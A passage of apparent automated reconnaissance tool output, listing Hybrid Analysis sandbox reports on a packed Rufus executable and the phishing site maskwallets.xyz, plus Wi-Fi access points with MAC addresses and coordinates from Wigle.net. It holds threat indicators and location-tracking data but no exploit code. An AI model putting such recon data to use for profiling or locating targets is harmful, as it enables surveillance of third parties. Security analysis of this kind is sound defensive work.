37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:50c0:8000::153', u'continent': u'North America', u'region_iso_code': u'VA'} | 2606:50c0:8000::153 |
| 2023-05-12 02:47:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': None, u'major_os_version': None, u'submit_name': u'ecf2f4c2-dc6c-4d6c-834e-7ac6d6bf442c', u'signatures': [], u'threat_level': 2, u'size': 1153592, u'job_id': None, u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [], u'sha256': u'f37771fbb9a9747c255bfed791c8d25b170a05390c07b977ceed83fda2930db0', u'sha512': u'dc22c5b25f00a707903e09faa17102afa8c7c33c601c4a9e565f0ba1f9be38b2d3fd33d6cd4fb3f106559826e5b2d4830ebb47f454bd211e948abada5bd40bf7', u'image_file_characteristics': [], u'submissions': [{u'url': None, u'submission_id': u'64370fe20f088442d5071946', u'created_at': u'2023-04-12T20:09:06+00:00', u'filename': u'bounty-15063386060676181'}, {u'url': None, u'submission_id': u'64370d247780c23d00032858', u'created_at': u'2023-04-12T19:57:24+00:00', u'filename': u'bounty-14051327620374072'}, {u'url': None, u'submission_id': u'64370bdac68c37b99a0ec113', u'created_at': u'2023-04-12T19:51:54+00:00', u'filename': u'bounty-36669494506367222'}, {u'url': None, u'submission_id': u'619cd57e184a860ff1454993', u'created_at': u'2021-11-23T11:50:22+00:00', u'filename': u'file'}, {u'url': None, u'submission_id': u'60b0d212be0b260c5b5c2673', u'created_at': u'2021-05-28T11:20:50+00:00', u'filename': u'9c86c817-2d20-4c17-99d4-c064eb928fba'}, {u'url': None, u'submission_id': u'6022b2dfcdbf532d3a42813f', u'created_at': u'2021-02-09T16:05:51+00:00', u'filename': u'ef96b60f-13a7-4976-b642-49e62cf6e2b5'}, {u'url': None, u'submission_id': u'5fce6345ef802718ed319dcc', u'created_at': u'2020-12-07T17:15:49+00:00', u'filename': u'ecf2f4c2-dc6c-4d6c-834e-7ac6d6bf442c'}], u'analysis_start_time': u'2020-12-07T17:15:49+00:00', u'tags': [], u'imphash': None, u'total_network_connections': 0, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 0, u'image_base': None, u'error_origin': None, u'ssdeep': None, u'entrypoint_section': None, u'md5': u'cd822912b4ff3c303a62d2538fa88d01', u'network_mode': u'default', u'processes': [], u'sha1': u'9bf6d9bbc06150a933b4171d55c7a8a297cd9cc5', u'url_analysis': False, u'type': u'PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed', u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Static Analysis', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': [u'peexe', u'executable']}, {u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 1, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': 4, u'submit_name': u'rufus-3.12.exe', u'signatures': [{u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-125', u'name': u'PE file has a big raw size section', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 0, u'description': u'Raw size of "UPX1" is "0x10d800" greater than 0x100000'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-95', u'name': u'PE file contains writable sections', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"f37771fbb9a9747c255bfed791c8d25b170a05390c07b977ceed83fda2930db0.bin" has an writable section named "UPX0"\n "f37771fbb9a9747c255bfed791c8d25b170a05390c07b977ceed83fda2930db0.bin" has an writable section named "UPX1"\n "f37771fbb9a9747c255bfed791c8d25b170a05390c07b977ceed83fda2930db0.bin" has an writable section named ".rsrc"'}, {u'category': u'General', u'origin': u'Certificate Data', u'identifier': u'certificate-2', u'name': u'The input sample is signed with a valid certificate', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1553/002', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1553.002', u'relevance': 10, u'threat_level': 0, u'type': 17, u'description': u'The entire certificate chain of the input sample was validated successfully.'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-80', u'name': u'PE file contains executable sections', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"f37771fbb9a9747c255bfed791c8d25b170a05390c07b977ceed83fda2930db0.bin" has an executable section named "UPX0"\n "f37771fbb9a9747c255bfed791c8d25b170a05390c07b977ceed83fda2930db0.bin" has an executable section named "UPX1"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"rufus-3.12.exe" touched "Group Policy Object" (Path: "HKCU\\WOW6432NODE\\CLSID\\{EA502722-A23D-11D1-A7D3-0000F87571E3}")\n "rufus-3.12.exe" touched "MSAA AccPropServices" (Path: "HKLM\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\TREATAS")\n "rufus-3.12.exe" touched "Task Bar Communication" (Path: "HKLM\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{56FDF344-FD6D-11D0-958A-006097C9A090}\\TREATAS")'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-18', u'name': u'Accesses Software Policy Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES"; Key: "A053375BFE84E8B748782C7CEE15827A6AF5A405")\n "rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES"; Key: "A053375BFE84E8B748782C7CEE15827A6AF5A405")\n "rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-96', u'name': u'PE file entrypoint instructions', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"f37771fbb9a9747c255bfed791c8d25b170a05390c07b977ceed83fda2930db0.bin" file has an entrypoint instructions - "pushal,movesi, 0x61b015,leaedi, [esi - 0x21a015],pushedi,movebp, esp,leaebx, [esp - 0x3e80],xoreax, eax,pusheax,cmpesp, ebx,jne0x727b08,incesi,incesi,pushebx,push0x325b65,pushedi,addebx, 4,pushebx,push0x10cad3,pushesi,addebx, 4,pushebx,pusheax,movdword ptr [ebx], 0x20003,pushebp,pushedi,pushesi,pushebx,subesp, 0x7c,movedx, dword ptr [esp + 0x90],movdword ptr [esp + 0x74], 0,movbyte ptr [esp + 0x73], 0,movebp, dword ptr [esp + 0x9c],leaeax, [edx + 4],movdword ptr [esp + 0x78], eax,"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-70', u'name': u'Scanning for window names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1010', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1010', u'relevance': 10, u'threat_level': 0, u'type': 6, u'description': u'"rufus-3.12.exe" searching for window "Rufus 3.12.1710 "\n "rufus-3.12.exe" searching for class "Shell_TrayWnd"'}, {u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-2', u'name': u'Loads rich edit control libraries', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"rufus-3.12.exe" loaded module "%WINDIR%\\SysWOW64\\riched20.dll" at 6F040000'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-20', u'name': u'Reads Windows Trust Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 5, u'threat_level': 0, u'type': 3, u'description': u'"rufus-3.12.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING"; Key: "STATE")'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1112', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-203', u'attck_id': u'T1112', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\FLIGHTROOT"; Key: "")\n "rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\SMARTCARDROOT"; Key: "")\n "rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT"; Key: "")\n "rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")\n "rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE"; Key: "DISALLOWEDCERTSYNCDELTATIME")\n "rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE"; Key: "DISALLOWEDCERTLASTSYNCTIME")\n "rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\CABD2A79A1076A31F21D253635CB039D4329A5E8"; Key: "BLOB")\n "rufus-3.12.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES"; Key: "CABD2A79A1076A31F21D253635CB039D4329A5E8")'}, {u'c | 185.199.111.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | uyDunet (Net ID: 00:13:33:8F:4F:14) | 40.2024, 29.0398 |
| 2023-05-12 02:54:21 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/html;charset=utf-8 | vscode.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:E8:37:B2) | 41.8781, -87.6298 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:7D:86:07) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs | https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AIRV_3DF5 (Net ID: 00:05:B9:42:3D:F8) | 39.0469, -77.4903 |
| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | support@bigmarker.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://click9.bigmarker.com/links/BY79pHvYX2Z/QPJiO7I68/tMwYeVPDKIXG/IN5CQt3PP-?bu=7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff5125d2b050eecdfd56122f5766da81f9380883c6330281152549d890a090250ca7457e3d6af512de37a44ef72cc832a7cff15e41cb02af8a17863d1d3fd8b23804d4f2277ba16828665e73cb7759a78343309ede93ee8fcceaf565cf60789ea78d923ffa76fe3d', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:2872:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:2872:120:WilError_01"\n "SM0:2872:120:WilError_01"\n "SM0:2872:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.231.70.218:443"\n "138.91.254.96:443"\n "3.235.65.215:443"\n "13.227.21.122:443"\n "185.199.108.153:443"\n "13.227.21.6:443"\n "151.101.0.176:443"\n "142.251.2.156:443"\n "151.101.2.137:443"\n "162.247.241.14:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "click9.bigmarker.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\favicons"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\636_742791881\\shopping.js]- [targetUID: 00000000-00000636]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00000636]\n "Ruleset Data" has type "da |
| 2023-05-12 02:48:19 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://g.width/386,g.getcontext(m', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://math.pi/e,n=this.or.v,i=this.os.v,a=2*math.pi*n/(4*e),o=.5*-math.pi,s=3===this.data.d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://maskwallets.xyz/forms/v2.js', u'type': u'visited', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://maskwallets.xyz/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3252"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_cb4_IESQMMUTEX_0_519"\n "IsoScope_cb4_ConnHashTable<3252>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_cb4_IESQMMUTEX_0_303"\n "IsoScope_cb4_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_cb4_IE_EarlyTabStart_0xb2c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"154.82.100.125:80"\n "172.217.164.106:443"\n "142.251.46.234:80"\n "142.250.189.163:80"\n "43.251.41.15:443"\n "104.17.211.243:443"\n "142.251.214.132:443"\n "142.251.32.35:443"\n "104.17.212.243:443"\n "43.251.41.5:443"\n "208.89.12.90:443"\n "142.250.189.163:443"\n "185.199.110.153:443"\n "208.89.12.87:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"maskwallets.xyz"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: maskwallets.xyz\nDNT: 1\nConnection: Keep-Alive\nCookie: _ga=GA1.2.1689897167.1682546284; _gid=GA1.2.304489594.1682546284; _gat_gtag_UA_37075177_6=1; LPVID=EwOTcwNTgwYTNiMjZiNTE2; LPSID-88982875=upHQCJz-TiCz5i-z2-4hWg"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accdn.lpsnmedia.net"\n "ajax.googleapis.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "lpcdn.lpsnmedia.net"\n "lptag.liveperson.net"\n "maskwallets.xyz"\n "metamask.io"\n "perf.hsforms.com"\n "va.v.liveperson.net"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_1_.js")\n Found string ".w-widget-twitter {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim * {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-clear {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical) {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string 